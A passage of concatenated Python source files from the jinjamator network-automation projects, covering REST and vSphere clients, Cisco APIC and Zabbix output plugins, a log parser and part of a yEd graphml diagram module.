or ("secret" in k and isinstance(v, str))
):
obj[k] = redact(v, True)[1]
else:
obj[k] = redact(v)[1]
return redacted_passwords, obj
return redacted_passwords, obj
```
#### File: tools/rest_clients/jinjamator.py
```python
from jinjamator.external.rest_client.api import API
import logging
from pprint import pformat
from jinjamator.external.rest_client.resource import Resource
from jinjamator.external.rest_client.request import make_request
from jinjamator.external.rest_client.models import Request
from types import MethodType
class JinjamatorResource(Resource):
def add_action(self, action_name):
def action_method(
self,
*args,
body=None,
params=None,
headers=None,
action_name=action_name,
**kwargs,
):
url = self.get_action_full_url(action_name, *args)
method = self.get_action_method(action_name)
request = Request(
url=url,
method=method,
params=params or {},
body=body,
headers=headers or {},
timeout=self.timeout,
ssl_verify=self.ssl_verify,
kwargs=kwargs,
)
request.params.update(self.params)
request.headers.update(self.headers)
response = make_request(self.client, request)
if response.headers.get("Authorization"):
self.headers["Authorization"] = response.headers["Authorization"]
return response
setattr(self, action_name, MethodType(action_method, self))
class JinjamatorClient(object):
def __init__(self, url, **kwargs):
self._log = logging.getLogger()
self._base_url = url
self._username = kwargs.get("username", None)
self._password = kwargs.get("password", None)
self.api = API(
api_root_url=url, # base api url
params={}, # default params
headers={}, # default headers
timeout=10, # default timeout in seconds
append_slash=False, # append slash to final url
json_encode_body=True, # encode body as json
ssl_verify=kwargs.get("ssl_verify", None),
resource_class=JinjamatorResource,
)
def __str__(self):
return pformat(self.api.get_resource_list())
def login(self, username=None, password=<PASSWORD>):
if username:
self._username = username
if password:
self._password = password
auth_data = self.api.aaa.login.local.list(
params={"username": self._username, "password": self._password}
).body
token = auth_data.get("access_token")
self.api.headers["Authorization"] = token
return True
``` |
{
"source": "jinjamator/jinjamator-daemon-webui",
"score": 2
} |
#### File: jinjamator/jinjamator-daemon-webui/setup.py
```python
import setuptools
import os
from subprocess import check_output
command = "git describe --tags --dirty"
version_format = ("{tag}.dev{commitcount}+{gitsha}",)
def format_version(version, fmt):
parts = version.split("-")
assert len(parts) in (3, 4)
dirty = len(parts) == 4
tag, count, sha = parts[:3]
if count == "0" and not dirty:
return tag
return fmt.format(tag=tag, commitcount=count, gitsha=sha.lstrip("g"))
version = check_output(command.split()).decode("utf-8").strip()
with open("README.rst", "r") as fh:
long_description = fh.read()
with open("requirements.txt", "r") as fh:
install_requires = fh.read().split("\n")
setuptools.setup(
name="jinjamator-daemon-webui",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="WebUI for jinjamator in daemon mode",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/jinjamator/jinjamator-daemon-webui",
include_package_data=True,
packages=["jinjamator.daemon.webui"],
install_requires=install_requires,
license="ASL V2",
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.8",
"Topic :: System :: Installation/Setup",
"Topic :: System :: Systems Administration",
"Topic :: Utilities",
],
python_requires=">=3.8",
zip_safe=False,
)
``` |
{
"source": "jinjamator/jinjamator",
"score": 2
} |
#### File: wsa/logs/aclog.py
```python
from textfsm import TextFSM
import os
from jinjamator.plugins.content import file
from jinjamator import plugin_loader
from io import StringIO
def parse(path):
plugin_loader.content.py_load_plugins(globals())
from os.path import dirname
raw_data = file.load(path)
base_path = dirname(__file__)
fields = None
for line in raw_data.split("\n"):
if line.startswith("#Fields"):
fields = line.replace("#Fields: ", "")
break
if not fields:
raise ValueError(f"Cannot find field description in file {path}")
fsm_mappings = []
for field, mapping in yaml.loads(file.load(f"{base_path}/fsm/aclog.mapping.yaml"))[
"fields"
].items():
if isinstance(mapping["name"], str):
name = str(mapping["name"])
fields = fields.replace("%" + field, "${" + name + "}")
if (f"Value Required {name} {mapping['regex']}") not in fsm_mappings:
fsm_mappings.append(f"Value Required {name} {mapping['regex']}")
elif isinstance(mapping["name"], list):
replacement = ""
for index, name in enumerate(mapping["name"]):
if name:
replacement += "${" + str(name) + "}"
if (
f"Value Required {name} {mapping['regex'][index]}"
) not in fsm_mappings:
fsm_mappings.append(
f"Value Required {name} {mapping['regex'][index]}"
)
else:
replacement += str(mapping["regex"][index])
fields = fields.replace("%" + field, replacement)
if "%" in fields:
raise NotImplementedError(f"Missing mapping for field. {fields}")
dynamic_fsm_template = task.run(
dirname(__file__) + "/fsm/aclog.textfsm.j2",
{"MAPPINGS": "\n".join(fsm_mappings), "LINE_SPEC": fields},
output_plugin="null",
)[0]["result"]
log.debug(dynamic_fsm_template)
re_table = TextFSM(StringIO(dynamic_fsm_template))
retval = []
for row in re_table.ParseText(raw_data):
tmp = {}
for i, v in enumerate(re_table.header):
tmp[v] = row[i]
retval.append(tmp)
return retval
```
#### File: vsphere/hosts/portgroups.py
```python
import re
def list(hosts=None):
if hosts == None:
hosts = vmware.vsphere.hosts.list()
retval = {}
for host in hosts:
pg = host.config.network.portgroup
retval[host] = pg
return retval
def find(search, return_type="obj", hosts=None):
rgx = re.compile(search)
retval = {}
for host, obj in list(hosts).items():
retval[host] = []
for pg in obj:
if rgx.search(str(pg.key)):
log.debug(f"found portgroup key: {pg.key}")
if return_type == "name":
retval[host].append(pg.key.replace("key-vim.host.PortGroup-", ""))
elif return_type == "obj":
retval[host].append(pg)
else:
retval[host].append(pg)
return retval
```
#### File: vmware/vsphere/__init__.py
```python
from pyVim.connect import SmartConnect, SmartConnectNoSSL, Disconnect
from pyVmomi import vim
vsphere_connection_pool = {}
def get_content(service_instance=None, cache=True):
if cache:
_cfg = _jinjamator.configuration
if vsphere_connection_pool.get(_cfg["vsphere_host"]):
if (
vsphere_connection_pool[_cfg["vsphere_host"]]
.get(_cfg["vsphere_username"], {})
.get("content")
):
log.debug("Using cached content")
return (
vsphere_connection_pool[_cfg["vsphere_host"]]
.get(_cfg["vsphere_username"], {})
.get("content")
)
if not service_instance:
service_instance = connect()
content = service_instance.RetrieveContent()
if cache:
vsphere_connection_pool[_cfg["vsphere_host"]][_cfg["vsphere_username"]][
"content"
] = content
return content
def get_obj(vimtype, name, content=None):
if not content:
content = get_content()
obj = None
container = content.viewManager.CreateContainerView(
content.rootFolder, vimtype, True
)
for c in container.view:
if c.name == name:
obj = c
break
return obj
def connect(host=None, username=None, password=<PASSWORD>, cache=True):
_cfg = _jinjamator.configuration
for param in ["vsphere_host", "vsphere_username", "vsphere_password"]:
if locals().get(param):
_cfg[param] = locals()[param]
if not _cfg[param]:
_jinjamator.handle_undefined_var(param)
if cache:
if vsphere_connection_pool.get(_cfg["vsphere_host"]):
if vsphere_connection_pool[_cfg["vsphere_host"]].get(
_cfg["vsphere_username"]
):
log.debug(
f'Using cached connection to VSphere host {_cfg["vsphere_host"]}'
)
return vsphere_connection_pool[_cfg["vsphere_host"]][
_cfg["vsphere_username"]
]["service_instance"]
service_instance = SmartConnectNoSSL(
host=_cfg["vsphere_host"],
user=_cfg["vsphere_username"],
pwd=_cfg["<PASSWORD>"],
port=443,
)
if service_instance:
log.debug(f"Connected VSphere host {_cfg['vsphere_host']}")
else:
raise Exception(f"Cannot connect VSphere host {_cfg['vsphere_host']}")
if cache:
vsphere_connection_pool[_cfg["vsphere_host"]] = {
_cfg["vsphere_username"]: {"service_instance": service_instance}
}
return service_instance
```
#### File: vsphere/vms/__init__.py
```python
from pyVmomi import vim
import re
def list(content=None):
if not content:
content = vmware.vsphere.get_content()
vm_view = content.viewManager.CreateContainerView(
content.rootFolder, [vim.VirtualMachine], True
)
obj = [vm for vm in vm_view.view]
vm_view.Destroy()
return obj
def list_names(content=None):
return [vm.name for vm in list(content)]
def find(search, return_type="obj", service_instance_content=None):
if not search:
return list()
rgx = re.compile(search)
retval = []
for obj in list():
if rgx.search(str(obj.name)):
if return_type == "name":
retval.append(obj.name)
elif return_type == "obj":
retval.append(obj)
else:
retval.append(obj)
return retval
```
#### File: output/apic/__init__.py
```python
import sys
import os
from jinjamator.tools.output_plugin_base import outputPluginBase, processError
from jinjamator.external.acitoolkit.acisession import Session
import getpass
from pprint import pformat
import json
from collections import defaultdict
import re
from pprint import pprint, pformat
import logging
def tree():
return defaultdict(tree)
class apic(outputPluginBase):
def __init__(self, parent):
self._log = logging.getLogger()
self._parent = parent
self.apic_dn_acl_rules = [
"uni/tn-\S+/ctx-.*,c,protect VRFs from deletion and configuration updates",
"uni/tn-[a-zA-Z0-9]+$,c,protect Tenant objects from deletion",
]
self._dn_acls = {}
self.apic_password = ""
self.apic_username = ""
self.apic_key = ""
self.apic_cert_name = ""
self.apic_url = ""
self.apic_session = None
def addArguments(self):
self._parent._parser.add_argument(
"-l",
"--apic-username",
dest="apic_username",
help="apic username [default: %(default)s]",
default="admin",
)
self._parent._parser.add_argument(
"-p",
"--apic-password",
dest="apic_password",
help="apic password",
default="",
)
self._parent._parser.add_argument(
"-u", "--apic-url", dest="apic_url", help="apic URL", default=""
)
self._parent._parser.add_argument(
"-k",
"--apic-key",
dest="apic_key",
help="path to apic user private key",
default="",
)
self._parent._parser.add_argument(
"--apic-certname",
dest="apic_cert_name",
help="path to apic user certificate",
default="",
)
self._parent._parser.add_argument(
"--apic-set-dn-acl-rule",
action="append",
dest="apic_dn_acl_rules",
help="format: <dn path regex>,<c(eate)|u(pdate)|d(delete)>,<remark> default: %(default)s",
default=self.apic_dn_acl_rules,
)
def init_plugin_params(self, **kwargs):
self._dn_acls = {}
for var in [
"apic_username",
"apic_url",
"apic_password",
"apic_key",
"apic_cert_name",
"apic_dn_acl_rules",
]:
if self._parent.configuration._data.get(var):
setattr(self, var, self._parent.configuration._data.get(var, ""))
@staticmethod
def get_json_schema(configuration={}):
# form = {
# "data": {
# "apic_cert_name": configuration.get("apic_cert_name", "")
# },
# "schema": {
# "type": "object",
# "title": "APIC Output Plugin Parameters",
# "properties": {
# "apic_cert_name": {
# "title": "Cert Name",
# "type": "string",
# "description": "Name of the APIC user certificate",
# }
# },
# },
# "options": {
# "fields": {
# "apic_cert_name": {
# "helper": [
# "Name of the APIC user certificate"
# ]
# }
# }
# },
# }
# return dict(form)
form = tree()
form["schema"]["type"] = "object"
form["schema"]["properties"]["apic_cert_name"]["title"] = "Cert Name"
form["schema"]["properties"]["apic_cert_name"]["type"] = "string"
form["schema"]["properties"]["apic_cert_name"][
"description"
] = "Name of the APIC user certificate"
form["schema"]["properties"]["apic_cert_name"]["default"] = configuration.get(
"apic_cert_name", ""
)
form["schema"]["properties"]["apic_key"]["title"] = "Key Path"
form["schema"]["properties"]["apic_key"]["type"] = "string"
form["schema"]["properties"]["apic_key"][
"description"
] = "Server side path to encryption key for cert authentication (overrides password)"
form["schema"]["properties"]["apic_key"]["default"] = configuration.get(
"apic_key", ""
)
form["schema"]["properties"]["apic_password"]["title"] = "Password"
form["schema"]["properties"]["apic_password"]["type"] = "string"
form["schema"]["properties"]["apic_password"][
"description"
] = "Cisco ACI password"
form["schema"]["properties"]["apic_password"]["format"] = "password"
form["schema"]["properties"]["apic_password"]["default"] = configuration.get(
"apic_password", ""
)
form["schema"]["properties"]["apic_username"]["title"] = "Username"
form["schema"]["properties"]["apic_username"]["type"] = "string"
form["schema"]["properties"]["apic_username"][
"description"
] = "Cisco ACI username"
# form['schema']['properties']['apic_username']['required']=True
form["schema"]["properties"]["apic_username"]["default"] = configuration.get(
"apic_username", "admin"
)
form["schema"]["properties"]["apic_url"]["title"] = "APIC URL"
form["schema"]["properties"]["apic_url"]["type"] = "string"
form["schema"]["properties"]["apic_url"][
"description"
] = "URL of Cisco ACI Controller"
# form['schema']['properties']['apic_url']['required']=True
# form["schema"]["properties"]["apic_url"]["default"] = configuration.get(
# "apic_url", "https://"
# )
form["schema"]["properties"]["apic_url"][
"pattern"
] = "^(https?:\\/\\/)\
((([a-z\\d]([a-z\\d-]*[a-z\\d])*)\\.?)+[a-z]*|\
((\\d{1,3}\\.){3}\\d{1,3}))\
(\\:\\d+)?(\\/[-a-z\\d%_.~+]*)*\
(\\?[;&a-z\\d%_.~+=-]*)?\
(\\#[-a-z\\d_]*)?$"
form["schema"]["properties"]["apic_url"]["default"] = configuration.get(
"apic_url", ""
)
form["options"]["fields"]["apic_url"]["order"] = 1
# form["options"]['fields']['apic_url']['hideInitValidationError']= True
form["options"]["fields"]["apic_username"]["order"] = 2
form["options"]["fields"]["apic_password"]["order"] = 3
form["options"]["fields"]["apic_key"]["order"] = 4
form["options"]["fields"]["apic_cert_name"]["order"] = 5
return dict(form)
def connect(self, **kwargs):
self.init_plugin_params()
self.init_acls()
if self.apic_key and self.apic_cert_name:
self.apic_session = Session(
self.apic_url,
self.apic_username,
cert_name=self.apic_cert_name,
key=self.apic_key,
subscription_enabled=False,
)
else:
if not self.apic_password:
self.apic_password = self._parent.handle_undefined_var("apic_password")
self.apic_session = Session(
self.apic_url,
self.apic_username,
self.apic_password,
subscription_enabled=False,
)
self.apic_session.login()
def init_acls(self):
for apic_dn_acl_rule in self.apic_dn_acl_rules:
if isinstance(apic_dn_acl_rule, str):
dn_regex, flags, remark = apic_dn_acl_rule.split(",")
self._dn_acls[dn_regex] = {
"rgx": re.compile(dn_regex),
"acls": {
"create": True if "c" in flags else False,
"read": True,
"update": True if "u" in flags else False,
"delete": True if "d" in flags else False,
},
"remark": remark,
}
elif isinstance(apic_dn_acl_rule, dict):
self._dn_acls[apic_dn_acl_rule["regex"]] = {
"rgx": re.compile(apic_dn_acl_rule["regex"]),
"acls": {
"create": True
if "create" in apic_dn_acl_rule["acls"]
else False,
"read": True,
"update": True
if "update" in apic_dn_acl_rule["acls"]
else False,
"delete": True
if "delete" in apic_dn_acl_rule["acls"]
else False,
},
"remark": apic_dn_acl_rule.get("remark", ""),
}
def check_acl(self, item):
obj_type = list(item.keys())[0]
attributes = item[obj_type]["attributes"]
for acl_string, acl in self._dn_acls.items():
if acl["rgx"].match(attributes["dn"]):
if (
attributes.get("status", "create") == "deleted"
and not acl["acls"]["delete"]
):
raise Exception(
"cannot delete dn {}, as it is forbidden by acl {}".format(
attributes["dn"], acl_string
)
)
elif acl["acls"]["create"] and acl["acls"]["update"]:
return True
existing_data = json.loads(
self.apic_session.get(
"/api/node/mo/{0}.json".format(attributes["dn"])
).text
)
if len(existing_data["imdata"]) > 0 and acl["acls"]["update"]:
return True
elif len(existing_data["imdata"]) == 0 and acl["acls"]["create"]:
return True
else:
raise Exception(
"cannot create or update dn {}, as it is forbidden by acl {} {}".format(
attributes["dn"], acl_string, pformat(acl["acls"])
)
)
else:
self._log.debug(
"no acl match acl {} dn {}".format(acl_string, attributes["dn"])
)
def process(self, data, **kwargs):
try:
if data in [None, "None", ""]:
self._log.debug("empty document -> nothing to do -> skipping")
return True
data = json.loads(data)
self._log.debug(json.dumps(data, indent=2))
except ValueError as e:
self._log.error(
"{0}\nis not a valid json document {1} -> invalid configuration -> skipping".format(
data, e
)
)
return False
except TypeError:
pass
for item in data["imdata"]:
try:
dn = item[list(item.keys())[0]]["attributes"]["dn"]
self.check_acl(item)
except IndexError:
continue
resp = self.apic_session.push_to_apic(
"/api/node/mo/{0}.json".format(dn), item, timeout=None
)
if not resp.ok:
self._log.error("POST request failed: {0}".format(pformat(resp.text)))
self._log.debug(pformat(item))
if "best_effort" in self._parent.configuration._data.keys():
return True
raise processError
else:
self._log.info("successfully sent config for dn {0}".format(dn))
self._log.debug(json.dumps(item, indent=2))
return True
``` |
{
"source": "jinjamator/jinjamator-plugin-output-zabbix",
"score": 2
} |
#### File: output/zabbix/__init__.py
```python
import sys
import os
from jinjamator.tools.output_plugin_base import outputPluginBase, processError
from pprint import pformat
import json
from collections import defaultdict
import re
from pprint import pprint, pformat
import logging
from pyzabbix import ZabbixMetric, ZabbixSender
def tree():
return defaultdict(tree)
class zabbix(outputPluginBase):
def __init__(self, parent):
self._log = logging.getLogger()
self._parent = parent
def addArguments(self):
self._parent._parser.add_argument(
"--zabbix-server",
dest="zabbix_server",
help="Zabbix server hostname or IP [default: %(default)s]",
default="127.0.0.1",
)
self._parent._parser.add_argument(
"--zabbix-server-port",
dest="zabbix_port",
help="Zabbix server port [default: %(default)s]",
default=10051,
)
self._parent._parser.add_argument(
"--zabbix-host",
dest="zabbix_host",
help="Hostname as it displayed in Zabbix [default: %(default)s]",
default="",
)
def init_plugin_params(self, **kwargs):
for var in ["zabbix_server", "zabbix_port", "zabbix_host"]:
if self._parent.configuration._data.get(var):
setattr(self, var, self._parent.configuration._data.get(var, ""))
@staticmethod
def get_json_schema(configuration={}):
form = tree()
form["schema"]["type"] = "object"
form["schema"]["properties"]["zabbix_server"]["title"] = "Zabbix Server"
form["schema"]["properties"]["zabbix_server"]["type"] = "string"
form["schema"]["properties"]["zabbix_server"][
"description"
] = "Zabbix server hostname or IP"
form["schema"]["properties"]["zabbix_port"]["title"] = "Port"
form["schema"]["properties"]["zabbix_port"]["type"] = "integer"
form["schema"]["properties"]["zabbix_port"][
"description"
] = "Zabbix server port"
form["schema"]["properties"]["zabbix_port"]["default"] = configuration.get(
"zabbix_port", 10051
)
form["schema"]["properties"]["zabbix_host"]["title"] = "Zabbix Hostname"
form["schema"]["properties"]["zabbix_host"]["type"] = "string"
form["schema"]["properties"]["zabbix_host"][
"description"
] = "Hostname as it displayed in Zabbix"
form["schema"]["properties"]["zabbix_host"]["default"] = configuration.get(
"zabbix_host", ""
)
form["options"]["fields"]["zabbix_server"]["order"] = 1
form["options"]["fields"]["zabbix_port"]["order"] = 2
form["options"]["fields"]["zabbix_host"]["order"] = 3
return dict(form)
def connect(self, **kwargs):
self.init_plugin_params()
self.zbx = ZabbixSender(
self._parent.configuration._data.get("zabbix_server"),
self._parent.configuration._data.get("zabbix_port"),
)
def process(self, data, **kwargs):
try:
if data in [None, "None", ""]:
self._log.debug("empty document -> nothing to do -> skipping")
return True
data = json.loads(data)
self._log.debug(json.dumps(data, indent=2))
except ValueError as e:
self._log.error(
"{0}\nis not a valid json document {1} -> invalid configuration -> skipping".format(
data, e
)
)
return False
except TypeError:
pass
metrics = []
for row in data:
target_hostname = row.get(
"hostname", self._parent.configuration._data.get("zabbix_host", None)
)
if target_hostname:
for k, v in row.items():
if k not in ["hostname"]:
m = ZabbixMetric(target_hostname, k, v)
metrics.append(m)
else:
log.error("Target Hostname not defined -> skipping")
log.debug(row)
self.zbx.send(metrics)
return True
``` |
{
"source": "jinjamator/N2G",
"score": 3
} |
#### File: N2G/N2G/N2G_yEd.py
```python
import xml.etree.ElementTree as ET
import hashlib
import os
from json import dumps as json_dumps # need it to dump metadata for edges/nodes
from json import loads as json_loads # need it to load metadata for edges/nodes
import logging
# initiate logging
log = logging.getLogger(__name__)
LOG_LEVEL = "ERROR"
LOG_FILE = None
def logging_config(LOG_LEVEL, LOG_FILE):
valid_log_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
if LOG_LEVEL.upper() in valid_log_levels:
logging.basicConfig(
format="%(asctime)s.%(msecs)d [N2G_YED %(levelname)s] %(lineno)d; %(message)s",
datefmt="%m/%d/%Y %I:%M:%S",
level=LOG_LEVEL.upper(),
filename=LOG_FILE,
filemode="w",
)
logging_config(LOG_LEVEL, LOG_FILE)
class yed_diagram:
"""
N2G yEd module allows to produce diagrams in yEd .graphml format.
**Parameters**
* ``node_duplicates`` (str) can be of value skip, log, update
* ``link_duplicates`` (str) can be of value skip, log, update
"""
# XML string templates to create lxml etree elements from:
graph_xml = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:java="http://www.yworks.com/xml/yfiles-common/1.0/java" xmlns:sys="http://www.yworks.com/xml/yfiles-common/markup/primitives/2.0" xmlns:x="http://www.yworks.com/xml/yfiles-common/markup/2.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:y="http://www.yworks.com/xml/graphml" xmlns:yed="http://www.yworks.com/xml/yed/3" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://www.yworks.com/xml/schema/graphml/1.1/ygraphml.xsd">
<!--Created by yEd 3.17.2-->
<key attr.name="Description" attr.type="string" for="graph" id="d0"/>
<key for="port" id="d1" yfiles.type="portgraphics"/>
<key for="port" id="d2" yfiles.type="portgeometry"/>
<key for="port" id="d3" yfiles.type="portuserdata"/>
<key attr.name="url" attr.type="string" for="node" id="d4"/>
<key attr.name="description" attr.type="string" for="node" id="d5"/>
<key for="node" id="d6" yfiles.type="nodegraphics"/>
<key for="graphml" id="d7" yfiles.type="resources"/>
<key attr.name="url" attr.type="string" for="edge" id="d8"/>
<key attr.name="description" attr.type="string" for="edge" id="d9"/>
<key for="edge" id="d10" yfiles.type="edgegraphics"/>
<key attr.name="nmetadata" attr.type="string" for="node" id="d11">
<default/>
</key>
<key attr.name="emetadata" attr.type="string" for="edge" id="d12">
<default/>
</key>
<key attr.name="gmetadata" attr.type="string" for="graph" id="d13">
<default/>
</key>
<graph edgedefault="directed" id="G">
</graph>
<data key="d7">
<y:Resources>
</y:Resources>
</data>
</graphml>
"""
shape_node_xml = """
<node id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">
<data key="{attrib_id}">
<y:ShapeNode>
<y:Geometry height="{height}" width="{width}" x="{x}" y="{y}"/>
<y:Fill color="#FFFFFF" transparent="false"/>
<y:BorderStyle color="#000000" raised="false" type="line" width="3.0"/>
<y:Shape type="{shape_type}"/>
</y:ShapeNode>
</data>
</node>
"""
svg_node_xml = """
<node id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">
<data key="{attrib_id}">
<y:SVGNode>
<y:Geometry width="{width}" height="{height}" x="{x}" y="{y}"/>
<y:Fill color="#CCCCFF" transparent="false"/>
<y:BorderStyle color="#000000" type="line" width="1.0"/>
<y:SVGNodeProperties usingVisualBounds="true"/>
<y:SVGModel svgBoundsPolicy="0">
<y:SVGContent refid="{refid}"/>
</y:SVGModel>
</y:SVGNode>
</data>
</node>
"""
group_node_xml = """
<node xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" id="nNodeID" yfiles.foldertype="group">
<data key="{attrib_id}">
<y:ProxyAutoBoundsNode>
<y:Realizers active="0">
<y:GroupNode>
<y:Geometry height="50.0" width="50.0" x="0.0" y="0.0"/>
<y:Fill color="#FFFFFF" color2="#FFFFFF" transparent="false"/>
<y:BorderStyle color="#000000" type="line" width="1.0"/>
<y:Shape type="rectangle"/>
<y:State closed="false" closedHeight="50.0" closedWidth="157.0" innerGraphDisplayEnabled="true"/>
<y:Insets bottom="5" bottomF="5.0" left="5" leftF="5.0" right="5" rightF="5.0" top="5" topF="5.0"/>
<y:BorderInsets bottom="0" bottomF="0.0" left="31" leftF="31.0" right="0" rightF="0.0" top="0" topF="0.0"/>
</y:GroupNode>
</y:Realizers>
</y:ProxyAutoBoundsNode>
</data>
<graph edgedefault="directed" id="nNodeID:">
</graph>
</node>
"""
edge_xml = """
<edge xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" id="{id}" source="{source}" target="{target}">
<data key="{attrib_id}">
<y:PolyLineEdge>
<y:LineStyle color="#000000" type="line" width="1.0"/>
<y:Arrows source="none" target="none"/>
<y:BendStyle smoothed="false"/>
</y:PolyLineEdge>
</data>
</edge>
"""
node_label_xml = """
<y:NodeLabel xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" alignment="center" autoSizePolicy="content" fontFamily="Dialog" fontSize="12" fontStyle="plain" hasBackgroundColor="false" hasLineColor="false" height="18" horizontalTextPosition="center"
iconTextGap="4" modelName="internal" modelPosition="c" textColor="#000000" verticalTextPosition="bottom" visible="true"
width="70"></y:NodeLabel>
"""
edge_label_xml = """
<y:EdgeLabel xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns" alignment="center" backgroundColor="#FFFFFF" configuration="AutoFlippingLabel" distance="2.0" fontFamily="Dialog" fontSize="12" fontStyle="plain" hasLineColor="false" height="18" horizontalTextPosition="center" iconTextGap="4" modelName="free" modelPosition="anywhere" preferredPlacement="target_on_edge" ratio="0.5" textColor="#000000" upX="-1.0" upY="-6E-17" verticalTextPosition="bottom" visible="true" width="32">
EdgeLabel
<y:PreferredPlacementDescriptor angle="0.0" angleOffsetOnRightSide="0" angleReference="relative_to_edge_flow" angleRotationOnRightSide="co" distance="-1.0" placement="center" side="on_edge" sideReference="relative_to_edge_flow"/>
</y:EdgeLabel>
"""
resource_xml = """
<y:Resource id="{id}" xmlns:y="http://www.yworks.com/xml/graphml" xmlns="http://graphml.graphdrawing.org/xmlns">{text_data}
</y:Resource>
"""
namespaces = {
"_default_ns_": "http://graphml.graphdrawing.org/xmlns",
"java": "http://www.yworks.com/xml/yfiles-common/1.0/java",
"sys": "http://www.yworks.com/xml/yfiles-common/markup/primitives/2.0",
"x": "http://www.yworks.com/xml/yfiles-common/markup/2.0",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"y": "http://www.yworks.com/xml/graphml",
"yed": "http://www.yworks.com/xml/yed/3",
}
def __init__(self, node_duplicates="skip", link_duplicates="skip"):
self.drawing = ET.fromstring(self.graph_xml)
self.graph_root = self.drawing.find("./_default_ns_:graph", self.namespaces)
self.y_attr = {}
self.node_duplicates = node_duplicates
self.link_duplicates = link_duplicates
self.edges_ids = {} # dictionary of "edge id hash": "yed generated edge id"
self.nodes_ids = {} # dictionary of "node id": "yed generated node id"
self.svg_pics_dict = {}
self._load_yattrs()
# register name spaces names to dump them properly in XML output
[ET.register_namespace(k, v) for k, v in self.namespaces.items()]
def _load_yattrs(self):
"""
function to load yed tags attributes adn form self.y_attr dict similar to this:
self.y_attr = {'edge': {'description': 'd9',
'edgegraphics': 'd10',
'emetadata': 'd12',
'url': 'd8'},
'graph': {'Description': 'd0', 'gmetadata': 'd13'},
'graphml': {'resources': 'd7'},
'node': {'description': 'd5',
'nmetadata': 'd11',
'nodegraphics': 'd6',
'url': 'd4'},
'port': {'portgeometry': 'd2', 'portgraphics': 'd1', 'portuserdata': 'd3'}}
"""
keys = self.drawing.findall("./_default_ns_:key", self.namespaces)
for key in keys:
if "attr.name" in key.attrib:
attrname = key.attrib["attr.name"]
elif "yfiles.type" in key.attrib:
attrname = key.attrib["yfiles.type"]
self.y_attr.setdefault(key.attrib["for"], {})
self.y_attr[key.attrib["for"]][attrname] = key.attrib["id"]
def _create_label_element(
self,
xml_template, # string, name of XML label template
label="", # string, center label of edge/nodes
path="", # string, xml tree path, if empty, work with element tag
**kwargs # attributes for edge/node label lement at "path" tag
):
"""
function to create label elemnts for appending to edge/nodes' elements
"""
element = ET.fromstring(xml_template)
if label != None:
element.text = label
if path == "":
element.attrib.update(kwargs)
else:
element.find(path, self.namespaces).attrib.update(kwargs)
return element
def _create_data_element(
self,
id, # string, id of data element, e,g, d11, d4, d1 etc.
text, # string, text to add to data element
):
elem = ET.fromstring('<data key="{}"/>'.format(id))
elem.text = text.strip()
return elem
def _node_exists(self, id, **kwargs):
# check if node with given name already exists
if id in self.nodes_ids:
if self.node_duplicates == "log":
log.error("add_shape_node: node '{}' already added to graph".format(id))
elif self.node_duplicates == "skip":
pass
elif self.node_duplicates == "update":
self.update_node(id, **kwargs)
return True
else:
return False
def add_shape_node(
self,
id,
label="",
top_label="",
bottom_label="",
attributes={},
description="",
shape_type="roundrectangle",
url="",
width=120,
height=60,
x_pos=200,
y_pos=150,
**kwargs
):
"""
Method to add node of type "shape".
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``label`` (str) label at the center of the node, by default equal to id attribute
* ``top_label`` (str) label displayed at the top of the node
* ``bottom_label`` (str) label displayed at the bottom of the node
* ``description`` (str) string to save as node ``description`` attribute
* ``shape_type`` (str) shape type, default - "roundrectangle"
* ``url`` (str) url string to save a node ``url`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``x_pos`` (int) node position on x axis
* ``y_pos`` (int) node position on y axis
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'Shape' : {'type': 'roundrectangle'},
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
"""
# check duplicates
if self._node_exists(
id,
label=label,
top_label=top_label,
bottom_label=bottom_label,
attributes=attributes,
description=description,
):
return
self.nodes_ids[id] = id
# create node element:
node = ET.fromstring(
self.shape_node_xml.format(
attrib_id=self.y_attr["node"]["nodegraphics"],
id=id,
shape_type=shape_type,
width=width,
height=height,
x=x_pos,
y=y_pos,
)
)
# add labels
if label == "":
label = id
labels = {"c": label, "t": top_label, "b": bottom_label}
ShapeNode = node.find("./_default_ns_:data/y:ShapeNode", self.namespaces)
for position, label_text in labels.items():
if label_text.strip():
ShapeNode.append(
self._create_label_element(
self.node_label_xml, label_text, modelPosition=position
)
)
# add description data and url
if description != "":
node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original node ID in nmetadata attribute - used to load graph from file:
node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id}),
)
)
# set attributes for the node children:
self.set_attributes(ShapeNode, attributes)
# addnode to graph
self.graph_root.append(node)
def add_svg_node(
self,
pic,
id,
pic_path="./Pics/",
label="",
attributes={},
description="",
url="", # string, data to add tonode URL
width=50,
height=50,
x_pos=200,
y_pos=150,
**kwargs
):
"""
Method to add SVG picture as node by loading SVG file content into graphml
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``pic`` (str) mandatory, name of svg file
* ``pic_path`` (str) OS path to SVG file folder, default is ``./Pics/``
* ``label`` (str) label displayed above SVG node, if not provided, label set equal to id
